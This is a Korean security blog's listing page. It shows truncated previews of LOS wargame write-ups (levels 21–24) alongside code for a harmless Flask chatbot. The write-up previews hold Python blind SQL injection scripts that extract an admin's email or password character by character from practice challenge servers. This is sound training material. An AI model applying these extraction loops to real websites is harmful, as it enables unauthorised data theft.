본문으로 바로가기

고퍼

현재위치 :: HOME BLOG CATEGORY SEARCH ARCHIVE TAGS MEDIA LOCATION GUESTBOOK

네비게이션

  • 홈
  • 태그
  • 미디어로그
  • 방명록
관리자
  • 블로그 이미지
    G0pher

    Information Security

    링크추가
  • 글쓰기
  • 환경설정
  • 로그인
  • 로그아웃

LOS :: 24번 EVIL_WIZARD

WRITE UP 1234567891011121314151617181920212223242526272829import requests url = "http://los.rubiya.kr/evil_wizard_32e3d35835aa4e039348712fb75169ad.php"session = {'PHPSESSID':'MY_SESSION'}data = {} flag="" print("[∞] flag : ",end='') for i in range(1,31): a=0 b=126 while b-a!=0: center = a+(b-a)//2 data['order']="id='admin' and ord(mid(email,"+str(i)+",1))>"+str(center)+" desc" res = requests.get..

Wargame/LOS(rubiya) 2018. 8. 27. 13:02

경돌이 코드 - weatherUpdate.py

weatherUpdate.py 1234567891011121314151617181920212223242526272829303132333435# -*- coding: utf-8 -*-import requestsimport osfrom bs4 import BeautifulSoup #현재날씨 요청url = "https://search.daum.net/search"params={ 'w' : 'tot', 'q' : '광교동 날씨'}res = requests.get(url, params = params)html = res.text #날씨 파트만 추출soup = BeautifulSoup(html, "lxml")weath = soup.find("div",{"class" : "cont_today"}) #현재기온 추출no..

카테고리 없음 2018. 8. 23. 11:00

경돌이 코드 - food_update.py

food_update.py 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899# -*- coding: utf-8 -*-import requestsfrom bs4 import BeautifulSoupimport datetime #요일설정dt = datetime.datetime.now()if dt.hour > 17: today = '%02d.%02d'%(dt.month,dt.day+1)else: today = '%02d.%0..

카테고리 없음 2018. 8. 23. 10:59

경돌이 코드 - k_process.py

k_process.py 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758# -*- coding: utf-8 -*- import requests def response(menu): menu = menu.encode('utf-8') w=["학교 날씨"] f=["오늘의 학식"] b=["고양이 버스"] res = {} if menu in w: res = weather(menu) elif menu in f: res = food(menu) elif menu in b: res = bus(menu) else: res = { "message" : {"text" : "이해하지 못함..

카테고리 없음 2018. 8. 23. 10:57

경돌이 코드 - k_main.py

k_main.py 123456789101112131415161718192021# -*- coding: utf-8 -*- import osimport k_processfrom flask import Flask, request, jsonify app = Flask(__name__) @app.route('/keyboard')def Keyboard(): res = k_process.buttons() return jsonify(res) @app.route('/message', methods=['POST'])def Message(): data = request.get_json() return jsonify(k_process.response(data['content'])) if __name__ == "__main__..

카테고리 없음 2018. 8. 23. 10:55

LOS :: 23번 HELL_FIRE

WRITE UP 1234567891011121314151617181920212223242526272829import requests url = "http://los.rubiya.kr/hell_fire_309d5f471fbdd4722d221835380bb805.php"session = {'PHPSESSID':'MY_SESSION'}data = {} flag="" print("[∞] flag : ",end='') for i in range(1,29): a=0 b=126 while b-a!=0: center = a+(b-a)//2 data['order']="id='admin' and ord(mid(email,"+str(i)+",1))>"+str(center)+" desc" res = requests.get(u..

Wargame/LOS(rubiya) 2018. 8. 23. 10:50

LOS :: 22번 DARK_EYES

WRITE UP 1234567891011121314151617181920212223242526272829303132import requests url = "http://los.rubiya.kr/dark_eyes_4e0c557b6751028de2e64d4d0020e02c.php"session = {'PHPSESSID':'MY_SESSION'}data = {} flag="" print("[∞] flag : ",end='') for i in range(1,9): a=0 b=100000 while b-a!=0: center = a+(b-a)//2 data['pw'] = "'||id='admin'&&(select greatest("+str(center) +",ord(mid(pw,"+str(i)+",1))) uni..

Wargame/LOS(rubiya) 2018. 8. 23. 10:33

LOS :: 21번 IRON_GOLEM

WRITE UP 12345678910111213141516171819202122232425262728293031import requests url = "http://los.rubiya.kr/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php"session = {'PHPSESSID':'MY_SESSION'}data = {} flag="" print("[∞] flag : ",end='') for i in range(1,18): a=0 b=100000 while b-a!=0: center = a+(b-a)//2+1 data['pw'] = "' or id='admin' and if(ord(mid(pw,"+str(i)+",1))

Wargame/LOS(rubiya) 2018. 8. 23. 10:30
  • 이전
  • 1
  • ···
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • ···
  • 49
  • 다음

사이드바

NOTICE

  • 전체 보기
MORE+

CATEGORY

  • 전체보기 (364)
    • Programing (102)
      • C (38)
      • Batch Script (3)
      • Python (25)
      • Java (9)
      • Android (0)
      • HTML (12)
      • php (5)
      • Javascript (7)
      • Scratch (3)
    • Study (110)
      • web (11)
      • network (20)
      • reversing (31)
      • system (39)
      • crypto (9)
      • AI (0)
    • Wargame (85)
      • webhacking.kr (25)
      • wargame.kr (0)
      • LOS(eagle-jump) (21)
      • LOS(rubiya) (32)
      • reversing.kr (0)
      • etc (7)
    • CTF (0)
    • ETC (53)
      • knowledge (37)
      • status (16)

RECENTLY

  • 최근 글
  • 최근 댓글

최근 글

최근댓글

Trackback

TAG

  • SQL
  • 어셈블리어
  • writeup
  • 파이썬
  • HTML
  • 웹 해킹
  • 시스템
  • Python
  • webhacking.kr
  • 웹
  • injection
  • 리버싱
  • web
  • Los
  • 네트워크
MORE+

ARCHIVE

CALENDAR

«   2025/09   »
일 월 화 수 목 금 토
1 2 3 4 5 6
7 8 9 10 11 12 13
14 15 16 17 18 19 20
21 22 23 24 25 26 27
28 29 30

LINK

  • ♡
  • DESIGN 아띠 그래픽
  • 이종찬
  • 박상현
  • 이창현
  • 송인봉
  • 신동철
  • 박준형
  • 유현진
  • 박형찬
  • 박형찬
  • 이우진
  • 조학근
  • 박홍주

VISITOR

오늘
어제
전체
  • 홈으로
  • 방명록
  • 로그인
  • 로그아웃
  • 맨위로
SKIN BY COPYCATZ COPYRIGHT 고퍼, ALL RIGHT RESERVED.
고퍼
블로그 이미지 G0pher 님의 블로그
MENU
  • 홈
  • 태그
  • 미디어로그
  • 방명록
CATEGORY
  • 전체보기 (364)
    • Programing (102)
      • C (38)
      • Batch Script (3)
      • Python (25)
      • Java (9)
      • Android (0)
      • HTML (12)
      • php (5)
      • Javascript (7)
      • Scratch (3)
    • Study (110)
      • web (11)
      • network (20)
      • reversing (31)
      • system (39)
      • crypto (9)
      • AI (0)
    • Wargame (85)
      • webhacking.kr (25)
      • wargame.kr (0)
      • LOS(eagle-jump) (21)
      • LOS(rubiya) (32)
      • reversing.kr (0)
      • etc (7)
    • CTF (0)
    • ETC (53)
      • knowledge (37)
      • status (16)
VISITOR 오늘 / 전체
  • 글쓰기
  • 환경설정
  • 로그인
  • 로그아웃
  • 취소

검색

티스토리툴바